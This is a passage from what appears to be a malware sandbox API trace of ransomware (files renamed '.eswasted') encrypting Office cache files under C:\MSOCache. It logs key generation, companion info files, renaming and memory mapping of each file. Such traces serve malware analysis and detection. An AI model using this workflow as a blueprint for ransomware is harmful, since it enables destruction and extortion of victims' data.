phProv=0x130fecc*=0x70cf20) returned 1 [0071.001] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.001] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0071.001] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml") returned 81 [0071.001] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2ac) returned 0x70c160 [0071.001] lstrcpyW (in: lpString1=0x70c202, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.001] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70f040 [0071.001] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70cf20) returned 1 [0071.002] CryptGenRandom (in: hProv=0x70cf20, dwLen=0xa46, pbBuffer=0x70f040 | out: pbBuffer=0x70f040) returned 1 [0071.002] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0071.002] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0071.003] WriteFile (in: hFile=0x124, lpBuffer=0x70f040*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x70f040*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.004] SetEndOfFile (hFile=0x124) returned 1 [0071.004] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.004] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f040 | out: hHeap=0x6d0000) returned 1 [0071.004] lstrcpyW (in: lpString1=0x70c202, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.004] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.eswasted")) returned 1 [0071.007] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0071.007] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0071.007] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0xc72 [0071.007] MapViewOfFile (hFileMappingObject=0x11c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc72) returned 0x330000 [0071.007] CloseHandle (hObject=0x12c) returned 1 [0071.010] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.010] CloseHandle (hObject=0x11c) returned 1 [0071.010] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x70b720 [0071.010] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70cf20) returned 1 [0071.011] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x1b8, pbBuffer=0x70b768 | out: pbBuffer=0x70b768) returned 1 [0071.011] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0071.011] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70cf20) returned 1 [0071.012] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.012] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0071.021] SetEndOfFile (hFile=0x124) returned 1 [0071.023] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f040 | out: hHeap=0x6d0000) returned 1 [0071.023] CloseHandle (hObject=0x124) returned 1 [0071.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0071.024] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b2d0 | out: hHeap=0x6d0000) returned 1 [0071.024] _aulldvrm () returned 0x0 [0071.024] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70cf20) returned 1 [0071.025] CryptGenRandom (in: hProv=0x70cf20, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.025] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0071.025] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70c160 [0071.025] lstrcpyW (in: lpString1=0x70c1f8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.025] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x70f040 [0071.025] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70cf20) returned 1 [0071.026] CryptGenRandom (in: hProv=0x70cf20, dwLen=0xa46, pbBuffer=0x70f040 | out: pbBuffer=0x70f040) returned 1 [0071.026] CryptReleaseContext (hProv=0x70cf20, dwFlags=0x0) returned 1 [0071.027] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0071.027] WriteFile (in: hFile=0x124, lpBuffer=0x70f040*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x70f040*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.028] SetEndOfFile (hFile=0x124) returned 1 [0071.028] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.028] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70f040 | out: hHeap=0x6d0000) returned 1 [0071.028] lstrcpyW (in: lpString1=0x70c1f8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.031] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0071.032] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.032] GetFileSize (in: hFile=0x12c, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x106f [0071.032] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x106f) returned 0x330000 [0071.032] CloseHandle (hObject=0x12c) returned 1 [0071.038] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.038] CloseHandle (hObject=0x128) returned 1 [0071.038] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x70b720 [0071.038] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.039] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x70b768 | out: pbBuffer=0x70b768) returned 1 [0071.039] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.039] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.040] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.040] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.049] SetEndOfFile (hFile=0x124) returned 1 [0071.051] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711040 | out: hHeap=0x6d0000) returned 1 [0071.051] CloseHandle (hObject=0x124) returned 1 [0071.053] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0071.053] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b3d0 | out: hHeap=0x6d0000) returned 1 [0071.053] _aulldvrm () returned 0x0 [0071.053] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.054] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.054] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.054] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0071.054] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a2) returned 0x70c160 [0071.054] lstrcpyW (in: lpString1=0x70c1f8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.054] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x711040 [0071.054] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.055] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x711040 | out: pbBuffer=0x711040) returned 1 [0071.055] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.055] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0071.057] WriteFile (in: hFile=0x124, lpBuffer=0x711040*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x711040*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.058] SetEndOfFile (hFile=0x124) returned 1 [0071.059] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.059] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711040 | out: hHeap=0x6d0000) returned 1 [0071.059] lstrcpyW (in: lpString1=0x70c1f8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.059] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted")) returned 1 [0071.059] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.059] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x12c [0071.060] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x978 [0071.060] MapViewOfFile (hFileMappingObject=0x12c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x978) returned 0x330000 [0071.060] CloseHandle (hObject=0x128) returned 1 [0071.070] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.070] CloseHandle (hObject=0x12c) returned 1 [0071.070] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x200) returned 0x70b720 [0071.096] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.097] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x70b768 | out: pbBuffer=0x70b768) returned 1 [0071.097] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.097] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.098] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.098] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.107] SetEndOfFile (hFile=0x124) returned 1 [0071.109] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711040 | out: hHeap=0x6d0000) returned 1 [0071.109] CloseHandle (hObject=0x124) returned 1 [0071.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0071.111] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c530 | out: hHeap=0x6d0000) returned 1 [0071.111] ResetEvent (hEvent=0xfc) returned 1 [0071.111] _aulldvrm () returned 0x0 [0071.111] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.112] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.112] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.112] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml") returned 78 [0071.112] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a6) returned 0x70c160 [0071.112] lstrcpyW (in: lpString1=0x70c1fc, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.112] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x711040 [0071.112] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.113] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x711040 | out: pbBuffer=0x711040) returned 1 [0071.113] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.113] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0071.113] WriteFile (in: hFile=0x124, lpBuffer=0x711040*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x711040*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.114] SetEndOfFile (hFile=0x124) returned 1 [0071.114] SetFilePointer (in: hFile=0x124, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.114] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711040 | out: hHeap=0x6d0000) returned 1 [0071.114] lstrcpyW (in: lpString1=0x70c1fc, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.114] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.eswasted")) returned 1 [0071.115] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0071.115] CreateFileMappingW (hFile=0x128, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x130 [0071.115] GetFileSize (in: hFile=0x128, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x708 [0071.115] MapViewOfFile (hFileMappingObject=0x130, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x708) returned 0x330000 [0071.115] CloseHandle (hObject=0x128) returned 1 [0071.118] UnmapViewOfFile (lpBaseAddress=0x330000) returned 1 [0071.119] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.120] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.120] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.120] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.120] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.120] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.129] SetEndOfFile (hFile=0x124) returned 1 [0071.131] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715040 | out: hHeap=0x6d0000) returned 1 [0071.131] CloseHandle (hObject=0x124) returned 1 [0071.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70c160 | out: hHeap=0x6d0000) returned 1 [0071.132] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ce28 | out: hHeap=0x6d0000) returned 1 [0071.132] WaitForMultipleObjects (nCount=0x2, lpHandles=0x130ff80*=0xfc, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0071.139] _aulldvrm () returned 0x0 [0071.139] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.140] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.140] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.140] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0071.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b4) returned 0x70b630 [0071.140] lstrcpyW (in: lpString1=0x70b6da, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0071.140] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa46) returned 0x715040 [0071.141] CryptAcquireContextW (in: phProv=0x130fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fea8*=0x70f058) returned 1 [0071.141] CryptGenRandom (in: hProv=0x70f058, dwLen=0xa46, pbBuffer=0x715040 | out: pbBuffer=0x715040) returned 1 [0071.141] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.141] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.eswasted_info" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0071.142] WriteFile (in: hFile=0x11c, lpBuffer=0x715040*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x130fec4, lpOverlapped=0x0 | out: lpBuffer=0x715040*, lpNumberOfBytesWritten=0x130fec4*=0xa46, lpOverlapped=0x0) returned 1 [0071.143] SetEndOfFile (hFile=0x11c) returned 1 [0071.143] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0071.143] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715040 | out: hHeap=0x6d0000) returned 1 [0071.143] lstrcpyW (in: lpString1=0x70b6da, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0071.143] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.eswasted")) returned 1 [0071.150] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.eswasted" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x130 [0071.150] CreateFileMappingW (hFile=0x130, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x128 [0071.150] GetFileSize (in: hFile=0x130, lpFileSizeHigh=0x130fe94 | out: lpFileSizeHigh=0x130fe94*=0x0) returned 0x543 [0071.150] MapViewOfFile (hFileMappingObject=0x128, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x543) returned 0x330000 [0071.150] CloseHandle (hObject=0x130) returned 1 [0071.153] CryptAcquireContextW (in: phProv=0x130fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fe84*=0x70f058) returned 1 [0071.153] CryptGenRandom (in: hProv=0x70f058, dwLen=0x1b8, pbBuffer=0x7110a0 | out: pbBuffer=0x7110a0) returned 1 [0071.153] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.153] CryptAcquireContextW (in: phProv=0x130fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fbec*=0x70f058) returned 1 [0071.154] CryptGenRandom (in: hProv=0x70f058, dwLen=0x200, pbBuffer=0x130fc08 | out: pbBuffer=0x130fc08) returned 1 [0071.154] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.163] SetEndOfFile (hFile=0x11c) returned 1 [0071.165] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715450 | out: hHeap=0x6d0000) returned 1 [0071.165] CloseHandle (hObject=0x11c) returned 1 [0071.166] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70b630 | out: hHeap=0x6d0000) returned 1 [0071.166] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x70ce28 | out: hHeap=0x6d0000) returned 1 [0071.166] _aulldvrm () returned 0x0 [0071.166] CryptAcquireContextW (in: phProv=0x130fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x130fecc*=0x70f058) returned 1 [0071.167] CryptGenRandom (in: hProv=0x70f058, dwLen=0x48, pbBuffer=0x130ff08 | out: pbBuffer=0x130ff08) returned 1 [0071.167] CryptReleaseContext (hProv=0x70f058, dwFlags=0x0) returned 1 [0071.167] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0071.167] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2b4) returned 0x70b630 [0071.167] lstrcpyW (in: lpString1=0x70b6da, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" 